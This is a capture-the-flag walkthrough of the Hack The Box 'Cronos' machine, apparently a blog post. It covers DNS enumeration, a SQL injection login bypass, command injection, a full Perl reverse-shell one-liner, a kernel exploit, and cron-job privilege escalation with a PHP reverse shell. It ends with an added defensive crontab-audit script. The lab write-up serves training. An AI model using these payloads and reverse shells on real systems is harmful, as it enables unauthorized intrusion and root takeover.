Cronos HTB-Walkthrough

Today we are going to walk through the steps to compromise the Cronos HTB machine. An initial foothold is obtained via command execution through a web application, and privilege escalation is then achieved by a couple of methods. Let us check it out.

Initially, we need to perform a port scan to find the open ports on the target.

Ports 22, 53 and 80 are open

Now, let us enumerate the service details on each open port.

Service enumeration using the nmap tool

First, we need to perform DNS enumeration to check whether a name server has been configured on the target.

ns1.cronos.htb name server identified
The dig tool identified the cronos.htb and admin.cronos domains

Since we have identified the names cronos.htb, ns1.cronos.htb and admin.cronos, we need to add them to the /etc/hosts file.

Entries added to /etc/hosts file

Now, we will move on to the web server enumeration part.

ns1.cronos.htb shows the Apache default home page
admin.cronos.htb shows a web application login page
cronos.htb shows a simple web page

As initial enumeration, we will check the admin.cronos.htb page, because it exposes a web application. There are a couple of methods we can try against the login page: either a password brute force or SQL injection. We will try SQL injection here.

Username: admin' or '1'='1 #

Password: password

The SQL injection succeeds and we are logged into the application.

Web application home page after successful login

Since the username field is vulnerable to SQL injection, we can use the sqlmap tool to carry out the full SQL injection attack as below.

User table identified via the sqlmap tool
Admin user credentials identified

The web page is also vulnerable to command injection, as below.

The ls command listed all files in the current directory
Current user the web application runs as

Now, we need to inject reverse shell code here in order to get a reverse shell connection from the target machine.

Reference link: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Exploit: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Modified exploit: perl -e 'use Socket;$i="ip";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

We need to put our local IP address and port into the exploit. Meanwhile, let us start a netcat listener on our local machine.

Netcat listener started on port 443
Perl payload injected into the web application
Reverse shell established from the target machine

Privilege escalation method 1

One privilege escalation route is kernel exploitation. Searching Google for an "ubuntu 16.04" exploit turns up exploit 44298.

Kernel version of the Cronos machine
Exploit 44298 identified

As the gcc compiler is not installed on the victim machine, we need to compile the exploit on any 64-bit Ubuntu machine and then transfer it to the attacker machine.

After transferring it to the attacker machine, we can see the file as below.

64-bit executable file

We need to start a local web server in the above location so that the victim machine can download the executable file.

Root shell obtained
root.txt file obtained

Privilege escalation method 2

Our next step is to identify another privilege escalation method. To find one, we run LinEnum.sh on the victim machine.

Note: LinEnum.sh enumerates common privilege escalation weaknesses on the victim machine.

The crontab runs /var/www/laravel/artisan every minute

Now, we need to check whether we have write permission on the artisan file.

Full permissions available to the www-data user
The artisan file is an executable PHP script

Since root runs this file from cron every minute, our next step is to replace artisan with our PHP reverse shell script.

A PHP reverse shell script already exists on the Kali machine in the location below. We need to make a couple of tweaks: change the IP address and port number so the victim machine connects back to us.

php-reverse-shell.php located in /usr/share/webshells/php
IP address and port number changed as shown in the image

First, we need to move the malicious PHP file onto the victim machine and replace the artisan file with it, as below.

Netcat listener started on port 4444
Root shell achieved
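The weakness behind method 2 is a root cron job executing a file that a low-privileged user can overwrite. The following audit script is an added example written for this walkthrough (not from the original post, from LinEnum or from the machine itself): it parses /etc/crontab-format lines and flags any absolute path a job uses that is group- or world-writable or owned by an uid outside a trusted set. The crontab text and the files the demo creates are constructed samples.

```python
import os
import stat
import tempfile

# Constructed sample modelled on the Cronos finding: root runs the Laravel
# artisan script every minute (sample text, not the machine's real crontab).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
17 * * * * root /usr/local/bin/backup.sh
"""

def parse_system_crontab(text):
    """Yield (user, argv) for each job line in /etc/crontab format:
    five schedule fields, the user, then the command."""
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#") or "=" in fields[0]:
            continue  # blank line, comment or VAR=value assignment
        if len(fields) >= 7:
            yield fields[5], fields[6:]

def audit_crontab(text, root="/", trusted_uids=frozenset({0})):
    """Return (user, path) pairs for files a job references that are
    group/world-writable or owned by an untrusted uid. `root` lets the
    check run over a copied filesystem tree instead of the live one."""
    findings = []
    for user, argv in parse_system_crontab(text):
        for token in argv:
            if not token.startswith("/"):
                continue  # only absolute paths can be checked on disk
            path = os.path.join(root, token.lstrip("/"))
            if not os.path.isfile(path):
                continue  # skips /dev/null, directories, missing files
            st = os.stat(path)
            loose_mode = bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))
            if loose_mode or st.st_uid not in trusted_uids:
                findings.append((user, token))
    return findings

def demo():
    """Build a throwaway tree with a world-writable artisan (the Cronos
    case) and a locked-down backup.sh, then audit the sample crontab."""
    with tempfile.TemporaryDirectory() as root:
        for rel, mode in (("var/www/laravel/artisan", 0o777),
                          ("usr/local/bin/backup.sh", 0o755)):
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            open(path, "w").close()
            os.chmod(path, mode)
        # Demo files belong to whoever runs this, so trust that uid and let
        # the mode bits alone decide; only artisan should be reported.
        return audit_crontab(SAMPLE_CRONTAB, root, trusted_uids={os.getuid()})
```

Running audit_crontab over the real /etc/crontab (default root="/") is the check a defender would schedule; any hit means a cron user is executing something it does not fully own.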

If you like the content, please follow me on Medium and LinkedIn.

LinkedIn: https://www.linkedin.com/in/pravin-r-p-oscp-28497712b/
